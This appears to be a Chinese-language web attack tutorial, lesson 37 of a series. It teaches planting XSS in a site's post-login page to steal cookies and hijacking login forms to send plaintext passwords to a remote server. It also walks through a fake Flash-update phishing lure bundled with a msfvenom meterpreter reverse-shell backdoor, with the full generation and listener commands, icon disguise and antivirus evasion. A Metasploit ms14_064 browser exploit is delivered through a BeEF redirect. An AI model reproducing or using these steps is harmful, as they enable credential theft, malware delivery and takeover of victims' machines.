37、WEB攻防——通用漏洞&XSS跨站&权限维持&捆绑钓鱼&浏览器漏洞

文章目录


要想获取有效的cookie,需要:1、网站本身采用cookie进行验证;2、网站未做http-only等的防御手段。

XSS------后台植入Cookie&表单劫持(获取明文密码)

  1. 后台植入XSS获取Cookie,主要是在登录成功的文件中写入XSS代码,一旦有人登录成功访问登录成功的代码,就会触发XSS;
  2. 表单劫持,找到将用户名、密码提交给的特定文件,然后在文件中写入XSS,将明文用户名和密码发给远程服务器。
  • 后端php代码中的echo都会输出到html页面;html页面中的js代码如<script>会被
    浏览器执行。
  • 表单劫持主要解决网站不使用cookie进行验证;获取明文密码。

XSS------Flash钓鱼配合MSF捆绑上线

条件:Beef上线受控后或直接钓鱼(受害这爱看sese)

  1. 生成后门,msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe > flash.exe
  2. 生成钓鱼网站,立即下载 捆绑文件(正常软件+后门文件)

    捆绑文件:
    一起压缩两个文件


这样就生成了一个捆绑文件。下一步使用资源修改器Restorator更改压缩文件的图标,使得其更加逼真。

为了更加隐蔽,还需要对后门文件进行免杀处理。

  1. MSF配置监听状态:
bash 复制代码
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0 # 0.0.0.0代表本地任何网卡
set lport 6666
run # 监听
  1. 为什么点击该钓鱼网站:beef受控访问;某种爱好,提示flash版本低,需要安装新版flash。

XSS------浏览器网马配合MSF访问上线

条件:Beef上线受控后&直接钓鱼(浏览器存在0day),这种方式是直接攻击浏览器,生成带有网马的地址。用户一旦访问该网站,直接攻击浏览器,获取主机权限。

  1. 配置MSF生成URL(cve)
bash 复制代码
use exploit/windows/browser/ms14_064_old_code_execution
set allowpowershellpropmt true
set target 1
run
  1. 诱使受害者访问URL,思路:中了XSS之后,用beef直接跳转到网马网站

若漏洞是针对IE浏览器的,使用IE内核的其他浏览器也可能受该漏洞影响。注意漏洞的利用条件(系统版本、浏览器版本)

相关推荐
广州灵眸科技有限公司5 分钟前
瑞芯微RV1126B开发板(EASY-EAI-PI2) INI文件操作
java·前端·javascript·网络·人工智能
江华森41 分钟前
Web 开发基础:HTTP 与 REST
前端·网络协议·http
IT_陈寒1 小时前
Redis的KEYS命令把我搞崩溃了,改用SCAN才活过来
前端·人工智能·后端
Jackson__2 小时前
为什么 Agent 越聊越慢?聊聊 Context(上下文)管理
前端·agent·ai编程
KaMeidebaby2 小时前
卡梅德生物技术快报|抗体合成:多肽抗体合成工程化方案:Nsp2 保守肽多抗制备与多维度验证
前端·网络·数据库·人工智能·算法
青禾网络2 小时前
前端做音画匹配这件事,我从"随机塞"到"AI 自动对齐"
前端·github
2601_963771373 小时前
Hardening Enterprise WordPress Sites Against REST API Leaks and Bad Headers
前端·windows·word·php
蓝银草同学3 小时前
Stream 实战:博客列表排序、过滤与分页(AI 辅助学习 Java 8)
java·前端·后端
2601_957190903 小时前
飞行影院安装施工指南:场地、动感系统与影片内容配套
大数据·前端·人工智能
爱折腾的小黑牛3 小时前
简记往来批量录入功能的实现:从文本到结构化数据
前端·算法